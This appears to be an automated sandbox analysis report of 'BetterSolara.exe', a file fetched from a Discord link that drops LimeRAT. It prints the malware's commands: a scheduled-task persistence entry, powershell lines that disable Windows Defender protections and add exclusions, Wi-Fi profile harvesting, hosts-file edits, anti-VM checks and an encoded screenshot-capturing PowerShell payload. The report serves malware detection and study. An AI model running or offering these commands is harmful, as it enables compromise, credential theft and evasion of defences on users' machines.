Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 696 vlc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Token: SeIncreaseQuotaPrivilege 4456 wmic.exe Token: SeSecurityPrivilege 4456 wmic.exe Token: SeTakeOwnershipPrivilege 4456 wmic.exe Token: SeLoadDriverPrivilege 4456 wmic.exe Token: SeSystemProfilePrivilege 4456 wmic.exe Token: SeSystemtimePrivilege 4456 wmic.exe Token: SeProfSingleProcessPrivilege 4456 wmic.exe Token: SeIncBasePriorityPrivilege 4456 wmic.exe Token: SeCreatePagefilePrivilege 4456 wmic.exe Token: SeBackupPrivilege 4456 wmic.exe Token: SeRestorePrivilege 4456 wmic.exe Token: SeShutdownPrivilege 4456 wmic.exe Token: SeDebugPrivilege 4456 wmic.exe Token: SeSystemEnvironmentPrivilege 4456 wmic.exe Token: SeRemoteShutdownPrivilege 4456 wmic.exe Token: SeUndockPrivilege 4456 wmic.exe Token: SeManageVolumePrivilege 4456 wmic.exe Token: 33 4456 wmic.exe Token: 34 4456 wmic.exe Token: 35 4456 wmic.exe Token: 36 4456 wmic.exe Token: SeIncreaseQuotaPrivilege 4456 wmic.exe Token: SeSecurityPrivilege 4456 wmic.exe Token: SeTakeOwnershipPrivilege 4456 wmic.exe Token: SeLoadDriverPrivilege 4456 wmic.exe Token: SeSystemProfilePrivilege 4456 wmic.exe Token: SeSystemtimePrivilege 4456 wmic.exe Token: SeProfSingleProcessPrivilege 4456 wmic.exe Token: SeIncBasePriorityPrivilege 4456 wmic.exe Token: SeCreatePagefilePrivilege 4456 wmic.exe Token: SeBackupPrivilege 4456 wmic.exe Token: SeRestorePrivilege 4456 wmic.exe Token: SeShutdownPrivilege 4456 wmic.exe Token: SeDebugPrivilege 4456 wmic.exe Token: SeSystemEnvironmentPrivilege 4456 wmic.exe Token: SeRemoteShutdownPrivilege 4456 wmic.exe Token: SeUndockPrivilege 4456 wmic.exe Token: SeManageVolumePrivilege 4456 wmic.exe Token: 33 4456 wmic.exe Token: 34 4456 wmic.exe Token: 35 4456 wmic.exe Token: 36 4456 wmic.exe Token: SeIncreaseQuotaPrivilege 2624 wmic.exe Token: SeSecurityPrivilege 2624 wmic.exe Token: SeTakeOwnershipPrivilege 2624 wmic.exe Token: SeLoadDriverPrivilege 2624 wmic.exe Token: SeSystemProfilePrivilege 2624 wmic.exe Token: SeSystemtimePrivilege 2624 wmic.exe Token: SeProfSingleProcessPrivilege 2624 wmic.exe Token: SeIncBasePriorityPrivilege 2624 wmic.exe Token: SeCreatePagefilePrivilege 2624 wmic.exe Token: SeBackupPrivilege 2624 wmic.exe Token: SeRestorePrivilege 2624 wmic.exe Token: SeShutdownPrivilege 2624 wmic.exe Token: SeDebugPrivilege 2624 wmic.exe Token: SeSystemEnvironmentPrivilege 2624 wmic.exe Token: SeRemoteShutdownPrivilege 2624 wmic.exe Token: SeUndockPrivilege 2624 wmic.exe Token: SeManageVolumePrivilege 2624 wmic.exe Token: 33 2624 wmic.exe Token: 34 2624 wmic.exe Token: 35 2624 wmic.exe Token: 36 2624 wmic.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 696 vlc.exe 696 vlc.exe 696 vlc.exe 696 vlc.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 696 vlc.exe 696 vlc.exe 696 vlc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 696 vlc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4928 wrote to memory of 968 4928 msedge.exe 83 PID 4928 wrote to memory of 968 4928 msedge.exe 83 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 3084 4928 msedge.exe 84 PID 4928 wrote to memory of 1896 4928 msedge.exe 85 PID 4928 wrote to memory of 1896 4928 msedge.exe 85 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 PID 4928 wrote to memory of 1428 4928 msedge.exe 86 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 3416 attrib.exe 6100 attrib.exe 4940 attrib.exe 1664 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1245482251467362385/1245491763477610506/BetterSolara.exe?ex=6658f218&is=6657a098&hm=6d4a1d7d00451c014a500cb11aa96a187ef87e27e44a2d7e34eb3e57704912ab&1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa05d646f8,0x7ffa05d64708,0x7ffa05d647182⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:22⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:82⤵PID:1428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:82⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5460 /prefetch:82⤵PID:3968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:12⤵PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:12⤵PID:1676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:12⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5664 /prefetch:82⤵PID:692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:4408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5592
-
-
C:\Users\Admin\Downloads\BetterSolara.exe"C:\Users\Admin\Downloads\BetterSolara.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat" "3⤵PID:2076
-
C:\Windows\system32\chcp.comchcp.com 4374⤵PID:5824
-
-
C:\Windows\system32\find.exefInd4⤵PID:5852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp4⤵PID:5876
-
-
C:\Windows\system32\findstr.exefindstr /L /I set "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"4⤵PID:5776
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"4⤵PID:5916
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"4⤵PID:5924
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat"4⤵PID:5972
-
-
C:\Windows\system32\find.exefInd4⤵PID:5928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp4⤵PID:5944
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.execd57e4c171d6e8f5ea8b8f824a6a7316.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of FindShellTrayWindow
PID:5984
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c172d6e8f5ea8b8f824a6a7316.execd57e4c172d6e8f5ea8b8f824a6a7316.exe4⤵
- Checks computer location settings
- Executes dropped EXE
PID:6012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\Wservices.exe'"5⤵
- Creates scheduled task(s)
PID:5900
-
-
C:\Users\Admin\AppData\Roaming\Wservices.exe"C:\Users\Admin\AppData\Roaming\Wservices.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5608
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.execd57e4c271d6e8f5ea8b8f824a6a7316.exe4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6060 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe5⤵
- Views/modifies file attributes
PID:6100
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe5⤵
- Views/modifies file attributes
PID:4940
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2016
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption5⤵PID:5372
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name5⤵PID:5648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5912
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5928
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID5⤵PID:436
-
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1664
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:1992
-
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5552 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ptju2qp\5ptju2qp.cmdline"6⤵PID:1300
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7D4.tmp" "c:\Users\Admin\AppData\Local\Temp\5ptju2qp\CSC5D6606692E8A401787EA929A77CB4148.TMP"7⤵PID:6020
-
-
-
-
-
-
-
